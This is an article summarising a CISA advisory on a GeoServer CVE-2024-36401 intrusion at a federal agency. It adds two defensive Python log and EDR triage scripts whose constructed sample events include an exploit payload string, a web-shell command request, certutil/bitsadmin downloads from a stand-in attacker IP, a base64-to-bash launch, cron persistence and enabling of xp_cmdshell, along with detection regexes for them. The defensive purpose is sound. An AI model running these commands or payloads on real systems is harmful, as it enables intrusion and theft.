CISA Outlines Lessons Learned from the 2024 FCEB intrusion
A Cybersecurity and Infrastructure Security Agency (CISA) advisory details a 2024 intrusion at a U.S. federal civilian executive branch (FCEB) agency that began with the exploitation of CVE-2024-36401, a critical remote code execution vulnerability in GeoServer. CISA states, “CISA discovered that cyber threat actors gained access to the agency’s network on July 11, 2024, by exploiting GeoServer vulnerability CVE 2024-36401.” The activity persisted undetected for weeks: “The activity remained undetected for three weeks; the agency missed an opportunity to detect this activity on July 15, 2024, as they did not observe an alert from GeoServer 1 where the EDR detected the Stowaway tool.” The agency’s lessons learned point to three failures: delayed remediation of a critical vulnerability in a public-facing service, a delay in invoking third-party support under the incident response plan, and protection gaps, most notably that a public web server “lacked endpoint protection.” The timeline is tight: the bug was patched in June 2024, public proof-of-concept exploits appeared in July, and opportunistic scanning and exploitation of internet-exposed GeoServer instances were observed around July 9, two days before the agency was compromised. Together, these dates show how little time separated patch availability from exploitation of unpatched, internet-exposed services.
From July 11 to July 31, 2024, the threat actors moved from “GeoServer 1” to “GeoServer 2,” then to a “Web Server,” and finally to a “SQL Server.” Initial access followed reconnaissance and targeted exploitation of CVE-2024-36401; artifacts show the actors used Burp Suite’s Burp Scanner to profile the public GeoServer instance before exploiting it. Early post-exploitation activity included attempts to upload “.js” files; logs show those requests returned “404” responses, suggesting the uploads failed. Persistence was established across systems through uploaded web shells, scheduled “cron” jobs, and newly created local user accounts; CISA notes that the accounts were later deleted, likely to reduce forensic artifacts, and that web shells, including China Chopper, were present “on each server.” On the database tier, the actors enabled “xp_cmdshell,” the SQL Server extended stored procedure that runs operating-system commands. On Linux, privilege escalation attempts used the “dirtycow” tool (an exploit for the 2016 kernel copy-on-write race, CVE-2016-5195) to move beyond service-account access.
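The initial-access stage described above leaves traces in ordinary web-server access logs. The following Python script is an added example, not code from the advisory or the agency: it parses constructed combined-format log lines for a GeoServer host and flags requests whose OGC parameters carry the publicly reported CVE-2024-36401 payload shape (an XPath expression reaching java.lang.Runtime, a detail the page itself does not describe), PUT/POST attempts against script files together with their response codes (the “404” pattern the advisory reads as a failed upload), and requests to a server-side script path with a command-style query that would warrant checking where that file came from. The log lines, client addresses and file names are all constructed.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (combined log format) for a GeoServer host.
# Illustrative samples only, not log data from the CISA advisory.
SAMPLE_LOG = """\
198.51.100.7 - - [11/Jul/2024:02:14:05 +0000] "GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),%27id%27) HTTP/1.1" 200 517 "-" "Mozilla/5.0"
198.51.100.7 - - [11/Jul/2024:02:14:06 +0000] "GET /geoserver/wfs?service=WFS&version=1.1.0&request=GetFeature&typeName=sf:archsites HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
198.51.100.7 - - [11/Jul/2024:02:15:31 +0000] "PUT /geoserver/www/a.js HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.9 - - [11/Jul/2024:02:20:11 +0000] "GET /geoserver/web/ HTTP/1.1" 200 8912 "-" "Mozilla/5.0"
198.51.100.7 - - [11/Jul/2024:02:40:44 +0000] "GET /geoserver/x.jsp?cmd=whoami HTTP/1.1" 200 57 "-" "curl/8.4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Shape of the public CVE-2024-36401 proof of concept: an OGC request parameter such as
# valueReference, cql_filter or PropertyName is evaluated as an XPath expression that
# reaches java.lang.Runtime. This reflects public reporting on the bug, not the advisory text.
XPATH_EXEC = re.compile(
    r"exec\s*\(\s*java\.lang\.Runtime|java\.lang\.ProcessBuilder|getRuntime\s*\(\s*\)", re.I
)
UPLOAD_EXTS = {"js", "jsp", "jspx", "ashx", "aspx", "php", "sh"}  # script types worth flagging on PUT/POST
WEBSHELL_EXTS = {"jsp", "jspx", "ashx", "aspx", "php"}           # server-side script types GeoServer does not serve


def parse_line(line):
    """Split one combined-format line into fields; returns None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["decoded_query"] = unquote_plus(parts.query)  # decode %27 etc. before matching
    return rec


def extension(path):
    """Lower-cased file extension of the last path segment, or '' if there is none."""
    name = path.rsplit("/", 1)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def classify(rec):
    """Return the list of rule names that fire for one parsed request."""
    rules = []
    ext = extension(rec["path"])
    if rec["path"].lower().startswith("/geoserver/") and XPATH_EXEC.search(rec["decoded_query"]):
        rules.append("cve-2024-36401-xpath-exec")
    if rec["method"] in ("PUT", "POST") and ext in UPLOAD_EXTS:
        # A 404 on the upload path is the pattern the advisory reads as a failed upload.
        rules.append("script-upload-attempt" + ("-failed" if rec["status"] == 404 else ""))
    if ext in WEBSHELL_EXTS and rec["decoded_query"]:
        rules.append("possible-webshell-interaction")
    return rules


def triage(log_text):
    """Run every rule over every line; one finding per (request, rule) pair."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for rule in classify(rec):
            findings.append({"rule": rule, "ip": rec["ip"], "ts": rec["ts"],
                             "method": rec["method"], "path": rec["path"], "status": rec["status"]})
    return findings


def by_source(findings):
    """Count findings per client IP so the exploiting host stands out."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']:<14} {f['rule']:<30} {f['method']} {f['path']} -> {f['status']}")
    print(by_source(triage(SAMPLE_LOG)))
```

Two caveats for real deployments: the payload can also travel in a POST body (a WFS XML request), which a default access log does not record, so body capture or a WAF log is needed for full coverage; and GeoServer, being a Wicket application, has no legitimate reason to serve arbitrary “.jsp” or “.ashx” files, so any hit on the web-shell rule should be followed by checking the file’s creation time and owner on disk.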
Credential access relied primarily on brute-force techniques and misuse of service accounts; CISA adds that “They also accessed service accounts by exploiting their associated services.” Discovery was extensive and blended native utilities with external scanners. On Linux hosts, the operators ran “uname,” “env,” “ps,” “netstat,” and “who,” and used “cat” to read sensitive files, including “/etc/passwd,” resolver settings, distribution release data, and application configuration such as “web.xml.” On Windows systems, they ran “whoami,” “ipconfig,” “systeminfo,” “tasklist,” and “net group,” and produced recursive directory listings of “C:,” “C:\Users,” and IIS paths to map services and content. Network reconnaissance used the “fscan” tool for host discovery, service identification, and port scanning, along with targeted pings and scans for SSH, FTP, file shares, and web servers. The operators also staged shell scripts in “/tmp,” including “/tmp/mm.sh” (later renamed “aa.sh”) and an archive, “aaa.zip.”
Command-and-control and payload staging combined living-off-the-land downloads with custom proxying. The actors fetched files with “PowerShell,” “bitsadmin,” and “certutil,” and deployed the Stowaway multi-level proxy to route traffic from the internet through the web tier to internal resources. One observed execution launched the agent from a Tomcat service account directory; a secondary channel was later established over TCP/50012. “/tmp/mm.sh” was executed just before an encoded Stowaway launch, though its contents could not be recovered. Additional artifacts hosted on the adversary’s infrastructure included the “RingQ” defense-evasion utility (“RingQ.exe,” “RingQ.rar”), the “IOX” proxy, “BusyBox,” “WinRAR,” and multiple web shells and scripts (“Handx.ashx,” “start_tomcat.jsp,” and “.sh,” “.py,” and “.bat” files). Detection finally came on July 31, when the agency’s endpoint tool flagged “1.txt” on the SQL Server after the attackers transferred it with “bitsadmin,” prompting containment and a broader investigation that uncovered the earlier GeoServer intrusion.
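The discovery, persistence and command-and-control behaviour in the preceding three paragraphs maps onto host telemetry that an EDR or auditd pipeline already collects. The following Python triage script is an added example, not code from the advisory or the agency: it runs a small rule set over constructed EDR-style process and network events for the three tiers named above (the hostnames, command lines, addresses and the account name are assumptions). It flags LOLBin downloads via bitsadmin, certutil and PowerShell, enabling of xp_cmdshell, fscan execution, scripts staged under /tmp, crontab changes, base64-decoded launches piped to a shell, outbound connections to TCP/50012, a burst of distinct discovery commands on one host, and a local account that is created and later deleted on the same host.

```python
import re

# Constructed EDR-style process and network events for the three tiers named in the
# advisory. Hostnames, commands, addresses and the account name are assumptions.
EVENTS = [
    {"host": "GeoServer1", "kind": "process", "cmdline": "uname -a"},
    {"host": "GeoServer1", "kind": "process", "cmdline": "env"},
    {"host": "GeoServer1", "kind": "process", "cmdline": "ps -ef"},
    {"host": "GeoServer1", "kind": "process", "cmdline": "netstat -antp"},
    {"host": "GeoServer1", "kind": "process", "cmdline": "cat /etc/passwd"},
    {"host": "GeoServer1", "kind": "process", "cmdline": "useradd -m -s /bin/bash svc_tmp"},
    {"host": "GeoServer1", "kind": "process", "cmdline": "(crontab -l; echo '@reboot /root/.x/run.sh') | crontab -"},
    {"host": "GeoServer1", "kind": "process", "cmdline": "mv /tmp/mm.sh /tmp/aa.sh"},
    {"host": "GeoServer1", "kind": "process", "cmdline": "echo aGVsbG8= | base64 -d | bash"},
    {"host": "GeoServer1", "kind": "netconn", "direction": "out", "daddr": "203.0.113.5", "dport": 50012},
    {"host": "GeoServer1", "kind": "process", "cmdline": "userdel -r svc_tmp"},
    {"host": "WebServer", "kind": "process", "cmdline": "whoami"},
    {"host": "WebServer", "kind": "process", "cmdline": "fscan.exe -h 10.0.0.0/24 -p 21,22,80,445"},
    {"host": "SQLServer", "kind": "process",
     "cmdline": "bitsadmin /transfer job /download /priority high http://203.0.113.5/1.txt C:\\Windows\\Temp\\1.txt"},
    {"host": "SQLServer", "kind": "process", "cmdline": "sqlcmd -Q \"EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;\""},
    {"host": "SQLServer", "kind": "process",
     "cmdline": "certutil -urlcache -split -f http://203.0.113.5/RingQ.rar C:\\Windows\\Temp\\RingQ.rar"},
]

# Stateless command-line rules; each fires once per matching process event.
CMD_RULES = [
    ("lolbin-download", re.compile(
        r"\bbitsadmin(?:\.exe)?\s+/transfer|\bcertutil(?:\.exe)?\b.*-urlcache|"
        r"\bpowershell\b.*(?:DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b)", re.I)),
    ("xp_cmdshell-enabled", re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I)),
    ("fscan-network-scan", re.compile(r"\bfscan(?:\.exe)?\b", re.I)),
    ("tmp-staging-script", re.compile(r"(?<![\w/])/tmp/\S+\.sh\b")),   # /tmp/x.sh but not /var/tmp/x.sh
    ("cron-persistence", re.compile(r"\bcrontab\s+-|/etc/cron")),
    ("base64-decoded-launch", re.compile(r"base64\s+(?:-d|--decode)\b.*\|\s*(?:sh|bash)\b")),
]
STOWAWAY_PORT = 50012   # secondary channel port reported in the advisory
RECON_CMDS = {"uname", "env", "ps", "netstat", "who", "whoami", "ipconfig", "systeminfo", "tasklist"}
RECON_BURST = 4         # distinct discovery commands on one host before alerting once


def account_change(cmd):
    """Return ('add'|'del', name) for a local account creation or removal, else None."""
    t = cmd.split()
    if not t:
        return None
    if t[0] in ("useradd", "userdel"):
        args = [a for a in t[1:] if not a.startswith("-")]   # drop flags, keep the trailing name
        return ("add" if t[0] == "useradd" else "del", args[-1]) if args else None
    low = [a.lower() for a in t]
    if low[:2] == ["net", "user"] and len(t) >= 4:
        if "/add" in low:
            return ("add", t[2])
        if "/delete" in low:
            return ("del", t[2])
    return None


def recon_key(cmd):
    """Normalise a discovery command so repeated runs of the same tool count once."""
    t = cmd.split()
    if not t:
        return None
    if t[0] == "cat" and "/etc/passwd" in t:
        return "cat /etc/passwd"
    return t[0].lower() if t[0].lower() in RECON_CMDS else None


def triage(events):
    """Apply all rules in event order; stateful rules key on host so tiers stay separate."""
    findings, added, recon = [], {}, {}
    for ev in events:
        host = ev["host"]
        if ev["kind"] == "netconn":
            if ev.get("direction") == "out" and ev.get("dport") == STOWAWAY_PORT:
                findings.append({"host": host, "rule": "stowaway-secondary-channel",
                                 "detail": f"{ev['daddr']}:{ev['dport']}"})
            continue
        cmd = ev["cmdline"]
        for rule, rx in CMD_RULES:
            if rx.search(cmd):
                findings.append({"host": host, "rule": rule, "detail": cmd})
        key = recon_key(cmd)
        if key:
            seen = recon.setdefault(host, set())
            seen.add(key)
            if len(seen) == RECON_BURST:   # fire exactly once, when the threshold is reached
                findings.append({"host": host, "rule": "discovery-burst", "detail": ", ".join(sorted(seen))})
        chg = account_change(cmd)
        if chg:
            action, name = chg
            if action == "add":
                added[(host, name)] = cmd
            elif (host, name) in added:   # deletion of an account this same host created earlier
                findings.append({"host": host, "rule": "local-account-created-then-deleted", "detail": name})
    return findings


def by_host(findings):
    """Findings per host, which is how the advisory's lateral movement path becomes visible."""
    counts = {}
    for f in findings:
        counts[f["host"]] = counts.get(f["host"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f"{f['host']:<11} {f['rule']:<36} {f['detail']}")
    print(by_host(triage(EVENTS)))
```

The stateful rules are the ones worth keeping even after the specific tool names rotate: an account that is created and removed on the same host within one intrusion window, and a burst of distinct discovery commands from a service account that normally runs none, both survive a change of tooling, whereas the fscan and Stowaway port matches are tied to this campaign’s artifacts.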